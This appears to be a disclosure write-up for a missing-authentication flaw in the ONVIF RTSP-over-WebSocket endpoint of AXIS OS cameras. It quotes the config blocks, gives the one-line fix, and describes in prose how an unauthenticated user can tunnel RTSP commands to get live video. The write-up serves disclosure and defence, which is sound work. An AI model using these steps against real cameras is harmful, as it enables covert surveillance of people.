← THE INDEX · WRITEUP
AXIS OS ONVIF RTSP-over-WebSocket Endpoint Missing Authentication
Two WebSocket-to-RTSP proxy endpoints, functionally identical, sit side by side in Apache config. One has a Require directive. The ONVIF variant does not.
Two WebSocket-to-RTSP proxy endpoints, functionally identical, sit side by side in Apache config. One has a Require directive. The ONVIF variant does not.
AXIS OS exposes two WebSocket-to-RTSP proxy endpoints on camera devices. The standard endpoint at /rtsp-over-websocket (configured in tcpproxy_rtsp.conf) requires axis-rtsp-ws-session authentication. The ONVIF variant at /onvif/rtsp-over-websocket (configured in tcpproxy_rtsp_onvif.conf) is missing the Require directive entirely.
Both configuration files are included in all VirtualHost configurations via conf.d/vhosts/all/, meaning the ONVIF endpoint is reachable on the externally-facing VHost. Apache 2.4 allows requests to a <Location> block with no Require directive. An unauthenticated attacker who can reach the camera on the network can tunnel RTSP commands through the ONVIF WebSocket endpoint, obtain live video and audio, and conduct surveillance without credentials.
The finding was identified through static analysis of the extracted firmware Apache configuration.
An unauthenticated attacker on the same network as the camera can connect to ws://CAMERA_IP/onvif/rtsp-over-websocket using the rtsp.onvif.org WebSocket subprotocol, tunnel RTSP DESCRIBE/SETUP/PLAY commands, and receive the live video and audio stream with no credentials.
This is a complete bypass of video stream authentication. In deployments where cameras cover private or sensitive areas, this enables unauthorized surveillance. An attacker who can discover cameras via ONVIF or mDNS can access video streams across an entire deployment if the network is reachable.
The parent VirtualHost applies authentication at the <Directory "/usr/html"> level. Apache <Location> directives are independent of <Directory> directives. Because the WebSocket handler processes the connection rather than serving a file from the filesystem, the directory-level authentication does not apply to the Location block. Without an explicit Require in the Location, Apache 2.4 defaults to allowing the request.
The non-ONVIF configuration file (tcpproxy_rtsp.conf) has the correct directive:
<Location /rtsp-over-websocket>
...
Require axis-rtsp-ws-session
</Location>
The ONVIF file (tcpproxy_rtsp_onvif.conf) is identical in structure except it is missing that one line:
<Location /onvif/rtsp-over-websocket>
...
SetHandler websocket-handler
(no Require directive)
</Location>
The fix is one line in tcpproxy_rtsp_onvif.conf.
The following reproduces the finding. Replace CAMERA_IP with the target device's address.
Reported to the AXIS Security team through coordinated disclosure. The fix is to add Require axis-rtsp-ws-session to the ONVIF Location block in tcpproxy_rtsp_onvif.conf, matching the existing non-ONVIF configuration:
<Location /onvif/rtsp-over-websocket>
WebSockServProvTCPAddr localhost
WebSockServProvTCP6Addr ip6-localhost
WebSockServProvTCPPort RTSP
WebSockSubProt rtsp.onvif.org
WebSockTCPTimeout 60
SetHandler websocket-handler
Require axis-rtsp-ws-session
</Location>